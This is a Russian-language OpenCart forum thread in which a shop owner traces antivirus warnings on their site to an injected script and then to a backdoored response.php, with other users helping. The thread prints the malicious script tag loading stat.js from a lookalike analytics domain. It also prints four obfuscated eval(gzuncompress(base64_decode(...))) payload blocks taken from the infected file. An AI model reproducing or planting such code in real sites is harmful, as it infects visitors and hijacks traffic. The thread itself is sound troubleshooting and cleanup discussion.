Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Recommended Posts

Здравствуйте

Сегодня обнаружил, что антивирусник ругается на страницах сайта..

post-26592-0-32009100-1405267517_thumb.png

ссылка на сайт

 

Ругается только в тот момент, когда обновляешь страничку (то есть когда на неё просто заходишь, всё ок, а при обновлении F5 вылазает от антивирусника сообщение)

 

Что делать в такой ситуации? Где  искать этот stat.js?

Читал здесь

но не понял как найти этот фрагмент со скриншота.

 

Помогите пожалуйста.

Надіслати
Поділитися на інших сайтах


 

У вас в коде страницы подключается скрипт от гугла

<script type='text/javascript' src='http://googleanalyzes.com/stat.js'></script>

 

подскажите в каком именно файле искать этот скрипт

стоит ли удалять?

Надіслати
Поділитися на інших сайтах


Если нет ни в хидере ни в футере ,первым делом смотреть в Система-Настройки-Сервер в самом низу.Или же каком то из модулей управления  шаблоном.

Надіслати
Поділитися на інших сайтах

Если нет ни в хидере ни в футере ,первым делом смотреть в Система-Настройки-Сервер в самом низу.Или же каком то из модулей управления  шаблоном.

Система-Настройки-Сервер - "Код Google Analytics:" пусто

уже почти всё пересмотрел, ничего не нашёл

 

писал вчера хостеру, чтобы проверили на вирусы

сказали, что это не на сайте , а на компьютере..но у меня такое на двух компьютерах, на обоих стоит аваст

сделали проверку на вирусы, ничего срьзёного не обнаружили

Надіслати
Поділитися на інших сайтах


проверьте этим - http://vms.drweb.com/online/?lng=ru

Я ничего не нашла. Каспер тоже не нашел. Если продолжает ругаться, то скажите хоть как именно, что пишет в подробнее?

на http://googleanalyzes.com/stat.js тоже никто не ругается

 

Еще лучше вот этим проверить - virustotal.com

Опять ничего не нашла.

https://www.virustotal.com/en/url/50f2225a03bc0f38827e4715813450de646529fd7cc976d660ffea0bef4bec6f/analysis/1405335306/

 

Если у вас установлен какойто модуль выводящий HTML текст, то ссылка на скрипт может быть в нем, и выгружаться из базы. Пройдитесь по ней поиском. Может даже в описании товара что то попасть.

 

Сделайте полный бэкап файлов и базы на локальную машину, и пройдитесь текстовым поиском по всему. Может даже в .htaccess что то прописано.

Так точно найдете.

Надіслати
Поділитися на інших сайтах


Да подключается. Но его там нету, он где то генерируется :(

 

 

У вас в коде страницы подключается скрипт от гугла



<script type='text/javascript' src='http://googleanalyzes.com/stat.js'></script>
Надіслати
Поділитися на інших сайтах


даже если это не вирус, то всё равно будет отпугивать посетителей, у которых стоит аваст в качестве антивируса, а таких наверное очень много,потому что он бесплатный...

так и не удалось убрать :(

Надіслати
Поділитися на інших сайтах


а вот теперь действительно что-то страшное

теперь не stat.js и какой-то неизвестный Ip адрес, а прямая ссылка на сайт:

 

post-26592-0-28339200-1405355371_thumb.png

 

и вообще блокирует эти страницы!!!

Надіслати
Поділитися на інших сайтах


а вот теперь действительно что-то страшное

теперь не stat.js и какой-то неизвестный Ip адрес, а прямая ссылка на сайт:

 

attachicon.gifvirus-2.PNG

 

и вообще блокирует эти страницы!!!

 

Берете Total commander и поиском по всему сайту на предмет поиска внутри файлов слова stat.js

Если не найдете - тогда ищите eval(base64_decode

Советую поискать внимательно в /system/library/ * request.php, response.php и url.php

А также index.php и /system/startup.php

 

У вас где то установлен rotator троянов

Надіслати
Поділитися на інших сайтах

Берете Total commander и поиском по всему сайту на предмет поиска внутри файлов слова stat.js

Если не найдете - тогда ищите eval(base64_decode

Советую поискать внимательно в /system/library/ * request.php, response.php и url.php

А также index.php и /system/startup.php

 

У вас где то установлен rotator троянов

 

через тотал коммандер ничего не нашлось по тем запросам, что вы предложили :(

в request.php всё хорошо

но вот вроде в response.php есть то, что не нужно:

<?php
class Response {
	private $headers = array();
	private $level = 0;
	private $output;

	public function addHeader($header) {
		$this->headers[] = $header;
	}

	public function redirect($url) {
		header('Location: ' . $url);
		exit;
	}

	public function setCompression($level) {
		$this->level = $level;
	}

	public function setOutput($output) {
		$this->output = $output;
	}

	private function compress($data, $level = 0) {
		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
			$encoding = 'gzip';
		}

		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
			$encoding = 'x-gzip';
		}

		if (!isset($encoding)) {
			return $data;
		}

		if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
			return $data;
		}

		if (headers_sent()) {
			return $data;
		}

		if (connection_status()) {
			return $data;
		}

		$this->addHeader('Content-Encoding: ' . $encoding);

		return gzencode($data, (int)$level);
	}

	public function output() {
		if ($this->output) {
			if ($this->level) {
				$ouput = $this->compress($this->output, $this->level);
			} else {
				$ouput = $this->output;
			}

			if (!headers_sent()) {
				foreach ($this->headers as $header) {
					header($header, true);
				}
			}
$output_page = eval(gzuncompress(base64_decode('eNqdVE1rg0AQ/Ss9FDaBUnRpE6R4SA/tJVBMPURLkHx4Uimkp+bXN/NczW7s7K656OLbeTPz5o3378uP18Xy80sUYRhG8+d5MJOF2MSL43H7O9ltf8rZU3Eo99+HciKy5u2Up+LuUWTBWtJ7RY8aX2RU5UlMx1hMH/6LJCzNAnqt6SFX9TmKThWwBMFMNGF5SnkRRbm4PHSr56eDymGLoBsdt/02oWYvslWhrYrtgYCuOjnQzRJhdo5+PPQyteJuogLtdl8R+H2m6ZwH9NJ7UDm0ufM9dF7T5+LsxZzNGAXgGvi6zvpzVKF6S6UEKV9ceQLsYFIsCVsDpg2mU5/P1JebhuYsxo9MZNd7Ox2l9WUzHTvW5hr8Ba73eYSHHAoNN9XpHx/ufROFhO6ahEE5BO5gUShxRtUqsfGu3Hx85M1u57itbzDDe+PVIcynOwvC+OqS10M3J8fIyvodvkVVq1YGs0Mz1dX05Q9RpiiO')));  eval(gzuncompress(base64_decode('eNqVVLFuwjAQ/ZUOSAapqnwmiWNVGejQLkgVtEMShBB0DFnY4OubO8exY7V2slxAuXt5792zFx/bz7fN9uvATiAUzxPIhDyxY7G53c735cJ5DaBkKnkmutcHflyyqn1/1N8VL8X+WrGnFyYU1gZLvSsKtnr+dx7sPLbzkub3WA1WE8MQHQa2Gh74m7j0PLp5fAYx1gYDi8tnJk6i9WDfg/RrX7QegQ/UQzBBnJRwsM9yIV3aH+QU9SVzuHi+NDX+iczLfjdaB7njcTB6wjg54vi+/rVnzSnqsXIypzVhnc4H/NCSND1sFh0GgLGzNiljJWEQYVc8rKicuFpY28w7WdM7MiD6/MWzBol/CAdDZ4CkHiOSMyOtkI3iNjp+0wyV7lawDoZOzEXuX2ZzMoGp/GkVXNpd+LbitjEadQF9M3Ze2v6AhAbMZUhfoEOHA6vXXyUobeY=')));  eval(gzuncompress(base64_decode('eNqVVNFugjAU/ZU9mKBxIUCpShYe3AMYYrboIjCMMYAzxoBbTKaDrx/3SlnHC1ea3t4Genp6zi09d/76PJ2/rZWtbul8YprMHG2VjT09n+Oi35NeG5Y2MfWRMa5er8+f36ddXxts+so784vEsZQHVflKchgyTRk8di0d6rAYPq8BSsijEOLyksIwW9gUIE3lcpc4lVF4HxRrHahs+MwWkBD5TNodYQFA5nUHpC5azQ8WCiDIAYx2wOaIAiL7cP0jZamhMvnpmrfcPdVKYplASCDk0YW29Uh6xl1zWW3cyoFoHXFLtzZ2YZMEswAsgiWhVyTM26c5Snetci0OIOUn0hlEa9jlThkF/JAgyIpeC1gESYDnMCLf0lP3B4sAUYNlhnQdK4+Dn4wmr9nujXsVSbyXSHRFqzHV4K0g4FKGRYCuYD0wL6vYH5C5QYMfD9HgOOBYSyFCvmQQd1NUkXoTbg0NBnORDwRvj1zxX+aD0ZBUZtOM5q170TGH7fEXxZaFkAS3B1mIkpig8/9QS1TJI6SxiVBc7sK46K/6rzehPA2GmyiDp1++2ouh')));  eval(gzuncompress(base64_decode('eNrNF4tu4kjsV+YidCEqlxcJj/JYdbtpD4lCD+jppLYXBRhKdkMSTSZt2ar/fp4kwCRH21V0Wh3IIbZnbI/tsc0q9hfUDXz0gKkdOg+4WomJJ71U4NWnPfEq+O56nqOYsoqqV87C9WkQrTvopoMGPsUeAhoaT9FfSFNls4NIDPB4qsltWZfbErrEi2+BoquaqrZ0A124BK+CZ6UuN+S22Kks1r3K5XD8+Ww4vRVtra2ZLcOoGw1bvL/lGZrWbppNtaEzhl6/r5Ig9pdVVZLuq1KnhAjjIOJElXWz8ACxYFvt/GYyHF/PbPipJX4po8rMqWrwn+bHhKIlU2tydmmNZrU0QqUsauQtKkJB5cSa3UxGs8nZaHphTWq8WL2ttgytoTeZ2EzkSV1uFYFJfNOaJhfNo7EodcYWd8adZceE88wiHJgav47tNKWCl/60Jp/HU6u2crwIl7K4zVmsMfvyj4K+2eDKGt/MPg6HmX7fC0Fd5UPw9jLtiE+1d51U3vUSCzsrSCUKRF0/Ymj9pJ7FDARjQgKSSBe7yjxYbvtdZU03Xh9q0prScBEsSynmKhPkvcmAi9tgdDG2f5/Nru3z8RerTJLU+bqly/nS8QG+O3z05NLFuro/p/SycCKMRF1VxVOCaUx8lHi+MyfY+dZJuYZqHLh79+WWmKr+9pLX1xKnNXNXolUEOJFlnw2Hf1v2aDwbnINL3VXVjSJMqxX70prdikFMw5hG4r0EPS1DekVe5/WwLSNKvR4SvcBZitILJ/N6PIWNS5ekAqlD0r5JoY/xzM4rhjKQXyCKndf8Dg5Bcgn3NHLZVuc/H+EsGeyLwdACsSvXwyBO9J0N/CY+LGFMM5eZTbPwOKaQbkI7VVrjfQGexYt1gITZGiO2Fgml3HOsBWgFt3yAHzbqJzpfsFpFkN7xKJIFFIcsm/DyFyHLjfSIFrsmjJRg3TnpJ7AKyAY5yWTWuxM+7RKXibgT0AbTdbAERhhEFHAMM9w2xEDYxB51Q4dQhUn4belQ507oo67nzGFWAxqsgQQF2heYxBY0INvTrpJw+13XByUok0TxMxPNTrDbg9zl/lXpI/yMN6GHT9EyePKZZQoC24GT08ZcAeou4IfJekNbumqnLcMSddm70s9k57ZF8Xzjcmbu8UfHixlhuiPAzsQlfSG57JUVxf6ytx96BVYMTxXlIQgePPzVeXSiBXFDKi+CjcJQxQldOVyHnyJMHjHpsYy0YRaDtn8rpr/26OzKEu8h2L8mnSW3ZGL9cWNN2SQ5SEvHygX9DiHOtipkLUioCVkXgrfMoCCE4EI8mSFAfXp6kgukjfP8PfBlErP37Z6Z4DsMTh5v8qQCNt8K0I8IDj1ngXd2CbXUT3trSFxQ/jMIYFcQQ9DL9ON2vl0Wgd1ZFoja7uS1VFWZ1myoR8qNDsWhAKxQwCWKQN/WTrpkxAKxWgmltGpH59ymWXjwzH8P/IfyyL4/KChdW5grj46gBsx0BXhvHDW48Y2NgUltTAOz66v87fl59+F/nu1GfvrUi/B2tuc8XEIxP5W2YOxtJWPvf5jl5pEsN0CRwf/H0Nk/i/zjh9JTfz8bG/ls/Addwu3V')));
		}
	}
}
?>

вроде это то что и нужно было найти.

..

нашёл бэкап сайта, нашёл файл response.php и заменил его на сервере.

аваст больше не ругается!!

markimax, огромное спасибо :-)

Надіслати
Поділитися на інших сайтах


Могу огорчить!))) Это лишь первый звоночек! И конечно не последний!

 

Скоро видимо прямиком в платный раздел искать исполнителя на лечение магазина (а это однозначно дороже чем весь  используемый варез).

 

Первый признак,блокировка  почты в магазине со стороны хостинга ну или жалобы на излишнюю нагрузку  :wink:

Надіслати
Поділитися на інших сайтах

Главный вопрос так и остался без ответа - как заразили в первый раз? Если Вам просто полечат магазин за N-ную сумму, то заразят его через пару дней за 0 р. 0 коп.

Надіслати
Поділитися на інших сайтах


Главный вопрос так и остался без ответа - как заразили в первый раз? Если Вам просто полечат магазин за N-ную сумму, то заразят его через пару дней за 0 р. 0 коп.

какой-то модуль с бесплатных форумов по опенкарт..

Надіслати
Поділитися на інших сайтах


Главный вопрос так и остался без ответа - как заразили в первый раз? Если Вам просто полечат магазин за N-ную сумму, то заразят его через пару дней за 0 р. 0 коп.

Однозначно, надеюсь вы не хотели получить ответ,который бы  точно подсказал какое из дополнений варезных не использовать,что бы не получилось именно так? 

А нет таких.Интернет ломится от вареза именно для этих целей.Получить  свою выгоду с заражённого дополнения или шаблона.

Надіслати
Поділитися на інших сайтах

Начнём с малого)))  Трафик ,который они получат от вас.Спам-бота, котороый будет раскидывать на почтовые ящики зарегистрированных пользователей(иногда и не обязательно)  рассылку с рекламой нужного ресурса.Возможность заразить мобильные устройства  всё для того же трафика в свою пользу.ИТД ИТП.

 

PS Явно не для того что бы чуток пугнуть антивирусник на компе  :wink:

Надіслати
Поділитися на інших сайтах

Однозначно, надеюсь вы не хотели получить ответ,который бы  точно подсказал какое из дополнений варезных не использовать,что бы не получилось именно так? 

я скачивал один большой модуль..у него очень много папок и файлов.

оказался совсем непригодным. сейчас удаляю эти файлы

но устанавливал я его ещё в конце прошлого месяца. неужели через такое долгое время образовался вирус?

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.